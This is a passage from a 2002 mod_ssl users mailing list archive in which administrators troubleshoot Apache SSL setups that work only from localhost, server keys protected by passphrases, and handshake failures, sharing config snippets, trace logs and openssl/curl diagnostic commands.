g1SFhJT12755 for ; Thu, 28 Feb 2002 09:43:19 -0600 Message-ID: <029201c1c06a$67756de0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <200202272016.PAA23353@www21.ureach.com> Subject: Re: SSL works from localhost but not elsewhere Date: Thu, 28 Feb 2002 09:12:57 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Owen, Personally I am not a big fan of opening attachments from unknown sources. Since you're on this list, you're probably a trusted source but I was not aware that sending attachments through this list server was even an option. Perhaps I am a bit paranoid about viruses? With that said, here are a series of things that I would check. 1) Do you have a firewall that might be preventing HTTPS access? 2) Do other non-secure pages from that server come up in your browser-wowser? 3) In httpd.conf, do you have any entries similar to the following: NameVirtualHost $IPADDR ServerAdmin webmaster@$YOURDOMAINNAME ServerName $YOURDOMAINNAME Port 443 DocumentRoot /var/www/secure.yourdomain.name (or whereever you store your documents that you want to bring up on the secure server. You need to have something in that directory that you can bring up if you don't have index.html) ErrorLog logs/$YOURDOMAINNAME_err TransferLog logs/$YOURDOMAINNAME_transfer If you have the ErrorLog file, what is it telling you? Any hints there? Also, in your named.domain.xxx file, do you have an entry for your secure server if it is running on a different server than your main web site? Probably this info is more than you need, and I am a newbie, but better more than not enough :-) Good luck! Andrew Lietzow The ACL Group, Inc. sure that your firewall is allowing HTTP and HTTPS access? ----- Original Message ----- From: "Eric Webber" To: Sent: Wednesday, February 27, 2002 2:16 PM Subject: SSL works from localhost but not elsewhere > > > When I go to the url https://localhost > using netscape on the same box running > apache and mod_ssl, SSL appears to > work fine. > > But when I come in from a box other than > the box running apache and mod_ssl, I get > Page cannot be displayed. > > I have apache 1.3.20 RedHat, OpenSSL > version 0.9.6b, on redhat version 2.4.7-10. > > Is this because of the Servername ? I am at > a loss and cannot find the solution in the > mod_ssl documentation. Is there a set of > tests to help ferret out this problem ? > > warmest regards, > > > Eric Sean Webber > > > here is a copy of my httpd.conf as a file > attachment > > > > > ________________________________________________ > Get your own "800" number > Voicemail, fax, email, and a lot more > http://www.ureach.com/reg/tag ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 18:16:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA01302; Thu, 28 Feb 2002 18:15:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id SAA01282; Thu, 28 Feb 2002 18:14:54 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16gTov-0001cz-00 for ; Thu, 28 Feb 2002 08:54:17 -0800 Date: Thu, 28 Feb 2002 08:54:17 -0800 To: modssl-users@modssl.org Subject: Re: R?f. : RE: R?f. : Re: httpd doesn't start with own certificate Message-ID: <20020228165417.GE19379@squaretrade.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users you can use openssl to remove the password from the key-- it's in the `openssl rsa` man page. http://www.modssl.org/docs/2.8/ssl_faq.html#ToC31 There's also SSLPassPhraseDialog, referenced here: http://www.modssl.org/docs/2.8/ssl_reference.html#ToC2 glen On Thu, Feb 28, 2002 at 09:37:06AM +0100, Arnaud De Timmerman wrote: > > > hi, > > i've found what my problem was : > the ./ssl.key/server.key demo file ISN'T protected with a password, my key was > > i'll have a look in the docs now to find how to start the server if the private > key is protected with a password > i can't imagine the key hasn't to be protected for the server to start > > thanks all > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 19:08:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA05558; Thu, 28 Feb 2002 19:07:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bulk.resource.org id TAA05498; Thu, 28 Feb 2002 19:07:00 +0100 (MET) Received: from bulk.resource.org (localhost.resource.org [127.0.0.1]) by bulk.resource.org (8.12.2/8.12.2) with ESMTP id g1SI6n7Z015068 for ; Thu, 28 Feb 2002 10:06:49 -0800 (PST) Received: (from bburdick@localhost) by bulk.resource.org (8.12.2/8.12.2/Submit) id g1SI6nml015067 for modssl-users@modssl.org; Thu, 28 Feb 2002 10:06:49 -0800 (PST) From: Brad Burdick Message-Id: <200202281806.g1SI6nml015067@bulk.resource.org> Subject: Re: SSL works from localhost but not elsewhere In-Reply-To: <200202272016.PAA23353@www21.ureach.com> To: modssl-users@modssl.org Date: Thu, 28 Feb 2002 10:06:49 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL94 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brad Burdick X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > > > When I go to the url https://localhost > using netscape on the same box running > apache and mod_ssl, SSL appears to > work fine. > > But when I come in from a box other than > the box running apache and mod_ssl, I get > Page cannot be displayed. > > I have apache 1.3.20 RedHat, OpenSSL > version 0.9.6b, on redhat version 2.4.7-10. > > Is this because of the Servername ? I am at > a loss and cannot find the solution in the > mod_ssl documentation. Is there a set of > tests to help ferret out this problem ? same (or similar) problem here. i've just installed these on a solaris 8 x86 box: - apache 1.3.23 - mod_ssl 2.8.7-1.3.23 - openssl 0.9.6c - fake certificate for testing using the snakeoil CA i can connect using openssl and curl, but netscape and mozilla from linux and IE 5.x from win98 are failing. all 3 clients can connect to other SSL sites without problem up to 128-bit. i've turned up the log level and see the following for the failed connections. [28/Feb/2002 09:57:43 11626] [info] Connection to child 5 established (server dev.topbox.net:443, client 68.65.62.5) [28/Feb/2002 09:57:43 11626] [info] Seeding PRNG with 255 bytes of entropy [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Handshake: start [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Loop: before/accept initialization [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Write: SSLv3 read client hello B [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Exit: error in SSLv3 read client hello B [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Exit: error in SSLv3 read client hello B [28/Feb/2002 09:57:43 11626] [error] SSL handshake failed (server dev.topbox.net:443, client 68.65.62.5) (OpenSSL library error follows) [28/Feb/2002 09:57:43 11626] [error] OpenSSL: error:1408A0C1:lib(20):func(138):reason(193) this is a connection using 'curl -v https://dev.topbox.net/': [28/Feb/2002 10:01:21 11619] [info] Connection to child 0 established (server dev.topbox.net:443, client 68.65.62.5) [28/Feb/2002 10:01:21 11619] [info] Seeding PRNG with 255 bytes of entropy [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Handshake: start [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: before/accept initialization [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 read client hello A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write server hello A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write certificate A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write key exchange A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write server done A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 flush data [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 read finished A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write finished A [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 flush data [28/Feb/2002 10:01:21 11619] [trace] Inter-Process Session Cache (DBM) Expiry: old: 3, new: 1, removed: 2 [28/Feb/2002 10:01:21 11619] [trace] Inter-Process Session Cache: request=SET status=OK id=50E1590207BA3AD79ABFF90030434FB8E8DF0F684802105EF43DCABCA4454C36 timeout=300s (session caching) [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Handshake: done [28/Feb/2002 10:01:21 11619] [info] Connection: Client IP: 68.65.62.5, Protocol: TLSv1, Cipher: EDH-DSS-DES-CBC3-SHA (168/168 bits) [28/Feb/2002 10:01:22 11619] [info] Initial (No.1) HTTPS request received for child 0 (server dev.topbox.net:443) [28/Feb/2002 10:01:22 11619] [trace] OpenSSL: Write: SSL negotiation finished successfully [28/Feb/2002 10:01:22 11619] [info] Connection to child 0 closed with standard shutdown (server dev.topbox.net:443, client 68.65.62.5) here's the startup info for apache+mod_ssl: [28/Feb/2002 10:02:23 11505] [info] Init: 5nd restart round (already detached) [28/Feb/2002 10:02:23 11505] [info] Init: Reinitializing OpenSSL library [28/Feb/2002 10:02:23 11505] [trace] Inter-Process Session Cache (DBM) Expiry: old: 0, new: 0, removed: 0 [28/Feb/2002 10:02:23 11505] [info] Init: Seeding PRNG with 255 bytes of entropy [28/Feb/2002 10:02:23 11505] [info] Init: Configuring temporary RSA private keys (512/1024 bits) [28/Feb/2002 10:02:23 11505] [info] Init: Configuring temporary DH parameters (512/1024 bits) [28/Feb/2002 10:02:23 11505] [info] Init: Initializing (virtual) servers for SSL [28/Feb/2002 10:02:23 11505] [info] Init: Configuring server dev.topbox.net:443 for SSL protocol [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) Configuring DSA server certificate [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) Configuring DSA server private key i can turn loglevel up to debug if anyone thinks the extra output would be useful, but the logged results don't mean anything to me. :) -brad -- Brad Burdick | bburdick@media.org http://media.org/ | The medium is NOT the message ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 19:20:40 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA06966; Thu, 28 Feb 2002 19:19:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ureach.com id TAA06888; Thu, 28 Feb 2002 19:18:38 +0100 (MET) Received: from www23.ureach.com (www23.ureach.com [172.16.2.51]) by ureach.com (8.9.1/8.8.5) with ESMTP id NAA00896 for ; Thu, 28 Feb 2002 13:18:32 -0500 Received: (from nobody@localhost) by www23.ureach.com (8.9.3/8.9.1) id NAA18197; Thu, 28 Feb 2002 13:18:32 -0500 Date: Thu, 28 Feb 2002 13:18:32 -0500 Message-Id: <200202281818.NAA18197@www23.ureach.com> To: "Andrew Lietzow" , modssl-users@modssl.org From: Eric Webber Subject: Re: Re: SSL works from localhost but not elsewhere Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-vsuite-type: e Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eric Webber X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users thanks for the reply. I doubt it is the firewall since the I am trying to access https://192.168.0.80/ from another PC on the same LAN, i.e. router does not come into play. That IP address is an internal IP address to the LAN. So for example my webserver with mod_ssl running is on IP 192.168.0.80, and the PC I am trying to access it with is 192.168.0.3 for example. When I use a web browser on 192.168.0.80 with URL https://localhost/ or the URL https://192.168.0.80/ SSL works fine with corresponding log entries in both access_log and ssl_request log being made. But when I use browser on 192.168.0.3 with URL https://192.168.0.80/ it responds with Page Cannot be Displayed with Explorer, and connection refused with Netscape and in both cases no log entries are made on the server in either access_log or ssl_request log. Of course I checked if normal http works from 192.168.0.3 and it does of course. I am at a loss as to why this is. warmest regards, Eric Sean Webber ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag ---- On Thu, 28 Feb 2002, Andrew Lietzow (andrewl@theaclgroup.com) wrote: > Dear Owen, > Personally I am not a big fan of opening attachments from unknown > sources. > Since you're on this list, you're > probably a trusted source but I was not aware that sending attachments > through this list server was even an option. Perhaps I am a bit > paranoid > about viruses? > > With that said, here are a series of things that I would check. > 1) Do you have a firewall that might be preventing HTTPS access? > 2) Do other non-secure pages from that server come up in your > browser-wowser? > 3) In httpd.conf, do you have any entries similar to the following: > > NameVirtualHost $IPADDR > > > ServerAdmin webmaster@$YOURDOMAINNAME > ServerName $YOURDOMAINNAME > Port 443 > DocumentRoot /var/www/secure.yourdomain.name > (or whereever you store your documents that you want to bring up > on > the secure server. You need to have something in that directory that > you > can bring up if you don't have index.html) > ErrorLog logs/$YOURDOMAINNAME_err > TransferLog logs/$YOURDOMAINNAME_transfer > > > If you have the ErrorLog file, what is it telling you? Any hints there? > > Also, in your named.domain.xxx file, do you have an entry for your > secure > server if it is running on a different server than your main web site? > > Probably this info is more than you need, and I am a newbie, but better > more > than not enough :-) > > Good luck! > > Andrew Lietzow > The ACL Group, Inc. > > > > > > sure that your firewall is allowing HTTP and HTTPS access? > ----- Original Message ----- > From: "Eric Webber" > To: > Sent: Wednesday, February 27, 2002 2:16 PM > Subject: SSL works from localhost but not elsewhere > > > > > > > > When I go to the url https://localhost > > using netscape on the same box running > > apache and mod_ssl, SSL appears to > > work fine. > > > > But when I come in from a box other than > > the box running apache and mod_ssl, I get > > Page cannot be displayed. > > > > I have apache 1.3.20 RedHat, OpenSSL > > version 0.9.6b, on redhat version 2.4.7-10. > > > > Is this because of the Servername ? I am at > > a loss and cannot find the solution in the > > mod_ssl documentation. Is there a set of > > tests to help ferret out this problem ? > > > > warmest regards, > > > > > > Eric Sean Webber > > > > > > here is a copy of my httpd.conf as a file > > attachment > > > > > > > > > > ________________________________________________ > > Get your own "800" number > > Voicemail, fax, email, and a lot more > > http://www.ureach.com/reg/tag > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 19:21:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA07085; Thu, 28 Feb 2002 19:20:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ureach.com id TAA07008; Thu, 28 Feb 2002 19:19:58 +0100 (MET) Received: from www23.ureach.com (www23.ureach.com [172.16.2.51]) by ureach.com (8.9.1/8.8.5) with ESMTP id NAA32496 for ; Thu, 28 Feb 2002 13:19:49 -0500 Received: (from nobody@localhost) by www23.ureach.com (8.9.3/8.9.1) id NAA18583; Thu, 28 Feb 2002 13:19:50 -0500 Date: Thu, 28 Feb 2002 13:19:50 -0500 Message-Id: <200202281819.NAA18583@www23.ureach.com> To: "Brad Burdick" From: Eric Webber Subject: Re: Re: SSL works from localhost but not elsewhere Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-vsuite-type: e Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eric Webber X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users how would I use openssl and curl ? to check port 443 from a nonlocal host ? thanks !! ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag ---- On Thu, 28 Feb 2002, Brad Burdick (bburdick@media.org) wrote: > > > > > > When I go to the url https://localhost > > using netscape on the same box running > > apache and mod_ssl, SSL appears to > > work fine. > > > > But when I come in from a box other than > > the box running apache and mod_ssl, I get > > Page cannot be displayed. > > > > I have apache 1.3.20 RedHat, OpenSSL > > version 0.9.6b, on redhat version 2.4.7-10. > > > > Is this because of the Servername ? I am at > > a loss and cannot find the solution in the > > mod_ssl documentation. Is there a set of > > tests to help ferret out this problem ? > > same (or similar) problem here. > > i've just installed these on a solaris 8 x86 box: > > - apache 1.3.23 > - mod_ssl 2.8.7-1.3.23 > - openssl 0.9.6c > - fake certificate for testing using the snakeoil CA > > > i can connect using openssl and curl, but netscape and mozilla from > linux > and IE 5.x from win98 are failing. all 3 clients can connect to other > SSL > sites without problem up to 128-bit. > > > i've turned up the log level and see the following for the failed > connections. > > [28/Feb/2002 09:57:43 11626] [info] Connection to child 5 established > (server dev.topbox.net:443, client 68.65.62.5) > [28/Feb/2002 09:57:43 11626] [info] Seeding PRNG with 255 bytes of > entropy > [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Handshake: start > [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Loop: before/accept > initialization > [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Write: SSLv3 read client > hello B > [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Exit: error in SSLv3 read > client hello B > [28/Feb/2002 09:57:43 11626] [trace] OpenSSL: Exit: error in SSLv3 read > client hello B > [28/Feb/2002 09:57:43 11626] [error] SSL handshake failed (server > dev.topbox.net:443, client 68.65.62.5) (OpenSSL library error follows) > [28/Feb/2002 09:57:43 11626] [error] OpenSSL: > error:1408A0C1:lib(20):func(138):reason(193) > > > this is a connection using 'curl -v https://dev.topbox.net/': > > [28/Feb/2002 10:01:21 11619] [info] Connection to child 0 established > (server dev.topbox.net:443, client 68.65.62.5) > [28/Feb/2002 10:01:21 11619] [info] Seeding PRNG with 255 bytes of > entropy > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Handshake: start > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: before/accept > initialization > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 read client > hello A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write server > hello A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write > certificate A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write key > exchange A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write server > done A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 flush data > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 read client > key exchange A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 read finished > A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write change > cipher spec A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 write > finished A > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Loop: SSLv3 flush data > [28/Feb/2002 10:01:21 11619] [trace] Inter-Process Session Cache (DBM) > Expiry: old: 3, new: 1, removed: 2 > [28/Feb/2002 10:01:21 11619] [trace] Inter-Process Session Cache: > request=SET status=OK > id=50E1590207BA3AD79ABFF90030434FB8E8DF0F684802105EF43DCABCA4454C36 > timeout=300s (session caching) > [28/Feb/2002 10:01:21 11619] [trace] OpenSSL: Handshake: done > [28/Feb/2002 10:01:21 11619] [info] Connection: Client IP: 68.65.62.5, > Protocol: TLSv1, Cipher: EDH-DSS-DES-CBC3-SHA (168/168 bits) > [28/Feb/2002 10:01:22 11619] [info] Initial (No.1) HTTPS request > received for child 0 (server dev.topbox.net:443) > [28/Feb/2002 10:01:22 11619] [trace] OpenSSL: Write: SSL negotiation > finished successfully > [28/Feb/2002 10:01:22 11619] [info] Connection to child 0 closed with > standard shutdown (server dev.topbox.net:443, client 68.65.62.5) > > > here's the startup info for apache+mod_ssl: > > [28/Feb/2002 10:02:23 11505] [info] Init: 5nd restart round (already > detached) > [28/Feb/2002 10:02:23 11505] [info] Init: Reinitializing OpenSSL > library > [28/Feb/2002 10:02:23 11505] [trace] Inter-Process Session Cache (DBM) > Expiry: old: 0, new: 0, removed: 0 > [28/Feb/2002 10:02:23 11505] [info] Init: Seeding PRNG with 255 bytes > of entropy > [28/Feb/2002 10:02:23 11505] [info] Init: Configuring temporary RSA > private keys (512/1024 bits) > [28/Feb/2002 10:02:23 11505] [info] Init: Configuring temporary DH > parameters (512/1024 bits) > [28/Feb/2002 10:02:23 11505] [info] Init: Initializing (virtual) > servers for SSL > [28/Feb/2002 10:02:23 11505] [info] Init: Configuring server > dev.topbox.net:443 for SSL protocol > [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) > Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) > [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) > Configuring permitted SSL ciphers > [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] > [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) > Configuring DSA server certificate > [28/Feb/2002 10:02:23 11505] [trace] Init: (dev.topbox.net:443) > Configuring DSA server private key > > > i can turn loglevel up to debug if anyone thinks the extra output would > be > useful, but the logged results don't mean anything to me. :) > > -brad > -- > Brad Burdick | bburdick@media.org > http://media.org/ | The medium is NOT the message > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 19:33:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA08478; Thu, 28 Feb 2002 19:32:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id TAA08348; Thu, 28 Feb 2002 19:31:33 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16gV1A-0002nT-00 for ; Thu, 28 Feb 2002 10:11:00 -0800 Date: Thu, 28 Feb 2002 10:11:00 -0800 To: modssl-users@modssl.org Subject: Re: Re: SSL works from localhost but not elsewhere Message-ID: <20020228181100.GA9059@squaretrade.com> References: <200202281818.NAA18197@www23.ureach.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200202281818.NAA18197@www23.ureach.com> User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users you could have a local firewall on the machine-- iptables or ipchains, perhaps? Do you have a NameVirtualHost directive? Something liek: NameVirtualHost 192.168.0.80:443 In your SSL VirtualHost directive, have you specified the IP also? glen On Thu, Feb 28, 2002 at 01:18:32PM -0500, Eric Webber wrote: > thanks for the reply. > > I doubt it is the firewall since > the I am trying to access https://192.168.0.80/ > from another PC on the same LAN, i.e. router > does not come into play. > > That IP address is an internal IP address to the > LAN. So for example my webserver with mod_ssl > running is on IP 192.168.0.80, and the PC I am > trying to access it with is 192.168.0.3 for > example. > > When I use a web browser on 192.168.0.80 with > URL https://localhost/ or the URL > https://192.168.0.80/ SSL works fine with > corresponding log entries in both access_log > and ssl_request log being made. > > But when I use browser on 192.168.0.3 with > URL https://192.168.0.80/ it responds with > Page Cannot be Displayed with Explorer, and > connection refused with Netscape and in > both cases no log entries are made on the > server in either access_log or ssl_request log. > > > Of course I checked if normal http works from > 192.168.0.3 and it does of course. > > > I am at a loss as to why this is. > > warmest regards, > > Eric Sean Webber > > > > > > > > ________________________________________________ > Get your own "800" number > Voicemail, fax, email, and a lot more > http://www.ureach.com/reg/tag > > > ---- On Thu, 28 Feb 2002, Andrew Lietzow (andrewl@theaclgroup.com) > wrote: > > > Dear Owen, > > Personally I am not a big fan of opening attachments from unknown > > sources. > > Since you're on this list, you're > > probably a trusted source but I was not aware that sending > attachments > > through this list server was even an option. Perhaps I am a bit > > paranoid > > about viruses? > > > > With that said, here are a series of things that I would check. > > 1) Do you have a firewall that might be preventing HTTPS access? > > 2) Do other non-secure pages from that server come up in your > > browser-wowser? > > 3) In httpd.conf, do you have any entries similar to the following: > > > > NameVirtualHost $IPADDR > > > > > > ServerAdmin webmaster@$YOURDOMAINNAME > > ServerName $YOURDOMAINNAME > > Port 443 > > DocumentRoot /var/www/secure.yourdomain.name > > (or whereever you store your documents that you want to > bring up > > on > > the secure server. You need to have something in that directory > that > > you > > can bring up if you don't have index.html) > > ErrorLog logs/$YOURDOMAINNAME_err > > TransferLog logs/$YOURDOMAINNAME_transfer > > > > > > If you have the ErrorLog file, what is it telling you? Any hints > there? > > > > Also, in your named.domain.xxx file, do you have an entry for your > > secure > > server if it is running on a different server than your main web > site? > > > > Probably this info is more than you need, and I am a newbie, but > better > > more > > than not enough :-) > > > > Good luck! > > > > Andrew Lietzow > > The ACL Group, Inc. > > > > > > > > > > > > sure that your firewall is allowing HTTP and HTTPS access? > > ----- Original Message ----- > > From: "Eric Webber" > > To: > > Sent: Wednesday, February 27, 2002 2:16 PM > > Subject: SSL works from localhost but not elsewhere > > > > > > > > > > > > > When I go to the url https://localhost > > > using netscape on the same box running > > > apache and mod_ssl, SSL appears to > > > work fine. > > > > > > But when I come in from a box other than > > > the box running apache and mod_ssl, I get > > > Page cannot be displayed. > > > > > > I have apache 1.3.20 RedHat, OpenSSL > > > version 0.9.6b, on redhat version 2.4.7-10. > > > > > > Is this because of the Servername ? I am at > > > a loss and cannot find the solution in the > > > mod_ssl documentation. Is there a set of > > > tests to help ferret out this problem ? > > > > > > warmest regards, > > > > > > > > > Eric Sean Webber > > > > > > > > > here is a copy of my httpd.conf as a file > > > attachment > > > > > > > > > > > > > > > ________________________________________________ > > > Get your own "800" number > > > Voicemail, fax, email, and a lot more > > > http://www.ureach.com/reg/tag > > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > > User Support Mailing List > modssl-users@modssl.org > > Automated List Manager > majordomo@modssl.org > > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 19:38:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA09153; Thu, 28 Feb 2002 19:37:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bulk.resource.org id TAA09002; Thu, 28 Feb 2002 19:36:24 +0100 (MET) Received: from bulk.resource.org (localhost.resource.org [127.0.0.1]) by bulk.resource.org (8.12.2/8.12.2) with ESMTP id g1SIaH7Z015734 for ; Thu, 28 Feb 2002 10:36:17 -0800 (PST) Received: (from bburdick@localhost) by bulk.resource.org (8.12.2/8.12.2/Submit) id g1SIaHgH015728 for modssl-users@modssl.org; Thu, 28 Feb 2002 10:36:17 -0800 (PST) From: Brad Burdick Message-Id: <200202281836.g1SIaHgH015728@bulk.resource.org> Subject: Re: Re: SSL works from localhost but not elsewhere In-Reply-To: <200202281819.NAA18583@www23.ureach.com> To: modssl-users@modssl.org Date: Thu, 28 Feb 2002 10:36:17 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL94 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brad Burdick X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > how would I use openssl and curl ? to check > port 443 from a nonlocal host ? assuming you have the openssl pkg installed on the nonlocal host. $ openssl s_client -connect yourhost:443 -state -debug curl can be found at http://curl.haxx.se/ or depending on your OS, you may already have a pre-built pkg available. $ curl -v https://yourhost/ -brad -- Brad Burdick | bburdick@media.org http://media.org/ | The medium is NOT the message ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 19:43:14 2002 Received: 